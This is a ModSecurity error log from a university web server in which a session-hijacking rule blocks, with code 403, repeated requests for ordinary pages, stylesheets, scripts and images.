[Mon Aug 28 07:58:27.217110 2023] [:error] [pid 38068] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxM8Co-f0AAJS0EqMAAAAW"]
[Mon Aug 28 07:58:33.320792 2023] [:error] [pid 38113] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvxOcCo-f0AAJTh5JMAAAAD"]
[Mon Aug 28 07:58:33.499334 2023] [:error] [pid 38068] [client 114.142.172.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxOcCo-f0AAJS0EqUAAAAW"]
[Mon Aug 28 07:59:33.104206 2023] [:error] [pid 38075] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvxdcCo-f0AAJS7RzsAAAAB"]
[Mon Aug 28 07:59:34.379686 2023] [:error] [pid 37803] [client 66.249.70.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvxdsCo-f0AAJOr9zIAAAAL"]
[Mon Aug 28 07:59:35.403832 2023] [:error] [pid 38060] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvxd8Co-f0AAJSsrWsAAAAQ"]
[Mon Aug 28 07:59:36.368599 2023] [:error] [pid 38059] [client 66.249.70.7] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvxeMCo-f0AAJSr2l0AAAAO"]
[Mon Aug 28 08:00:13.814346 2023] [:error] [pid 38151] [client 36.72.11.144] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOvxncCo-f0AAJUH76MAAAAF"]
[Mon Aug 28 08:00:21.732155 2023] [:error] [pid 38075] [client 125.164.21.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxpcCo-f0AAJS7R0UAAAAB"]
[Mon Aug 28 08:00:22.019763 2023] [:error] [pid 38060] [client 125.164.18.187] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxpsCo-f0AAJSsrXIAAAAQ"]
[Mon Aug 28 08:00:23.536889 2023] [:error] [pid 38068] [client 125.164.22.53] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxp8Co-f0AAJS0ErgAAAAW"]
[Mon Aug 28 08:00:23.716068 2023] [:error] [pid 38151] [client 125.164.20.112] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxp8Co-f0AAJUH76YAAAAF"]
[Mon Aug 28 08:00:24.984567 2023] [:error] [pid 38075] [client 125.164.21.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxqMCo-f0AAJS7R0YAAAAB"]
[Mon Aug 28 08:00:25.128734 2023] [:error] [pid 38114] [client 125.164.19.111] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxqcCo-f0AAJTinTsAAAAE"]
[Mon Aug 28 08:00:27.869602 2023] [:error] [pid 38151] [client 125.164.20.112] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxq8Co-f0AAJUH76cAAAAF"]
[Mon Aug 28 08:00:27.927749 2023] [:error] [pid 38060] [client 125.164.21.57] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxq8Co-f0AAJSsrXMAAAAQ"]
[Mon Aug 28 08:00:35.264048 2023] [:error] [pid 38151] [client 125.164.23.133] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxs8Co-f0AAJUH76kAAAAF"]
[Mon Aug 28 08:00:35.404678 2023] [:error] [pid 38114] [client 125.164.20.112] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxs8Co-f0AAJTinT8AAAAE"]
[Mon Aug 28 08:00:40.222802 2023] [:error] [pid 38068] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvxuMCo-f0AAJS0ErwAAAAW"]
[Mon Aug 28 08:00:40.671941 2023] [:error] [pid 38149] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxuMCo-f0AAJUFNN0AAAAA"]
[Mon Aug 28 08:00:41.561225 2023] [:error] [pid 38075] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvxucCo-f0AAJS7R0wAAAAB"]
[Mon Aug 28 08:00:41.712934 2023] [:error] [pid 38061] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvxucCo-f0AAJSt5Z0AAAAR"]
[Mon Aug 28 08:00:41.790864 2023] [:error] [pid 38068] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvxucCo-f0AAJS0Er0AAAAW"]
[Mon Aug 28 08:00:41.915168 2023] [:error] [pid 38114] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvxucCo-f0AAJTinUIAAAAE"]
[Mon Aug 28 08:00:41.954774 2023] [:error] [pid 38065] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvxucCo-f0AAJSxYqUAAAAH"]
[Mon Aug 28 08:00:41.965183 2023] [:error] [pid 38149] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvxucCo-f0AAJUFNN4AAAAA"]
[Mon Aug 28 08:00:45.967089 2023] [:error] [pid 37803] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/web/content/detail/3"] [unique_id "ZOvxvcCo-f0AAJOr90AAAAAL"]
[Mon Aug 28 08:00:46.087879 2023] [:error] [pid 38068] [client 140.213.100.16] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxvsCo-f0AAJS0Er8AAAAW"]
[Mon Aug 28 08:00:46.243317 2023] [:error] [pid 38114] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvxvsCo-f0AAJTinUMAAAAE"]
[Mon Aug 28 08:00:46.373044 2023] [:error] [pid 38061] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxvsCo-f0AAJSt5Z4AAAAR"]
[Mon Aug 28 08:00:47.198452 2023] [:error] [pid 38151] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvxv8Co-f0AAJUH760AAAAF"]
[Mon Aug 28 08:00:47.200557 2023] [:error] [pid 38059] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvxv8Co-f0AAJSr2m0AAAAO"]
[Mon Aug 28 08:00:47.200993 2023] [:error] [pid 38065] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvxv8Co-f0AAJSxYqcAAAAH"]
[Mon Aug 28 08:00:47.214958 2023] [:error] [pid 38061] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvxv8Co-f0AAJSt5Z8AAAAR"]
[Mon Aug 28 08:00:47.379352 2023] [:error] [pid 38068] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvxv8Co-f0AAJS0EsEAAAAW"]
[Mon Aug 28 08:00:47.410593 2023] [:error] [pid 38059] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvxv8Co-f0AAJSr2m4AAAAO"]
[Mon Aug 28 08:00:57.478869 2023] [:error] [pid 38151] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvxycCo-f0AAJUH77MAAAAF"]
[Mon Aug 28 08:00:57.687564 2023] [:error] [pid 38059] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOvxycCo-f0AAJSr2nIAAAAO"]
[Mon Aug 28 08:00:57.717442 2023] [:error] [pid 38068] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/form-bg.png"] [unique_id "ZOvxycCo-f0AAJS0EsYAAAAW"]
[Mon Aug 28 08:00:57.731638 2023] [:error] [pid 38192] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg_form.png"] [unique_id "ZOvxycCo-f0AAJUwn3cAAAAI"]
[Mon Aug 28 08:00:57.882944 2023] [:error] [pid 38059] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/login2.png"] [unique_id "ZOvxycCo-f0AAJSr2nMAAAAO"]
[Mon Aug 28 08:00:58.153004 2023] [:error] [pid 38194] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvxysCo-f0AAJUy1q4AAAAK"]
[Mon Aug 28 08:01:07.927380 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx08Co-f0AAJSxYq0AAAAH"]
[Mon Aug 28 08:01:17.983533 2023] [:error] [pid 38075] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvx3cCo-f0AAJS7R04AAAAB"]
[Mon Aug 28 08:01:26.115940 2023] [:error] [pid 38193] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvx5sCo-f0AAJUxupQAAAAJ"]
[Mon Aug 28 08:01:26.417434 2023] [:error] [pid 38075] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx5sCo-f0AAJS7R08AAAAB"]
[Mon Aug 28 08:01:30.452189 2023] [:error] [pid 38193] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/index"] [unique_id "ZOvx6sCo-f0AAJUxupUAAAAJ"]
[Mon Aug 28 08:01:30.612487 2023] [:error] [pid 38068] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx6sCo-f0AAJS0EswAAAAW"]
[Mon Aug 28 08:01:34.312515 2023] [:error] [pid 38195] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx7sCo-f0AAJUz@gsAAAAM"]
[Mon Aug 28 08:01:35.723139 2023] [:error] [pid 38194] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx78Co-f0AAJUy1rYAAAAK"]
[Mon Aug 28 08:01:49.075831 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx-cCo-f0AAJSxYrcAAAAH"]
[Mon Aug 28 08:01:49.127269 2023] [:error] [pid 38113] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvx-cCo-f0AAJTh5J0AAAAD"]
[Mon Aug 28 08:02:23.976998 2023] [:error] [pid 38065] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyH8Co-f0AAJSxYr8AAAAH"]
[Mon Aug 28 08:02:24.232754 2023] [:error] [pid 38114] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyIMCo-f0AAJTinVUAAAAE"]
[Mon Aug 28 08:02:42.209703 2023] [:error] [pid 37918] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyMsCo-f0AAJQeRn0AAAAP"]
[Mon Aug 28 08:02:42.457514 2023] [:error] [pid 38194] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyMsCo-f0AAJUy1sIAAAAK"]
[Mon Aug 28 08:02:48.963730 2023] [:error] [pid 37918] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvyOMCo-f0AAJQeRn8AAAAP"]
[Mon Aug 28 08:02:49.246669 2023] [:error] [pid 38059] [client 61.247.28.29] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyOcCo-f0AAJSr2oUAAAAO"]
[Mon Aug 28 08:03:12.224495 2023] [:error] [pid 38195] [client 114.122.107.130] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvyUMCo-f0AAJUz@iAAAAAM"]
[Mon Aug 28 08:03:12.725301 2023] [:error] [pid 37803] [client 114.122.107.150] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvyUMCo-f0AAJOr91kAAAAL"]
[Mon Aug 28 08:03:15.812147 2023] [:error] [pid 38195] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/base.css"] [unique_id "ZOvyU8Co-f0AAJUz@iIAAAAM"]
[Mon Aug 28 08:03:15.929100 2023] [:error] [pid 38060] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/layout.css"] [unique_id "ZOvyU8Co-f0AAJSsrYcAAAAQ"]
[Mon Aug 28 08:03:15.929179 2023] [:error] [pid 38149] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/css/skeleton.css"] [unique_id "ZOvyU8Co-f0AAJUFNOsAAAAA"]
[Mon Aug 28 08:03:15.995656 2023] [:error] [pid 37539] [client 202.80.217.225] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/logo-header.png"] [unique_id "ZOvyU8Co-f0AAJKjZ38AAAAG"]
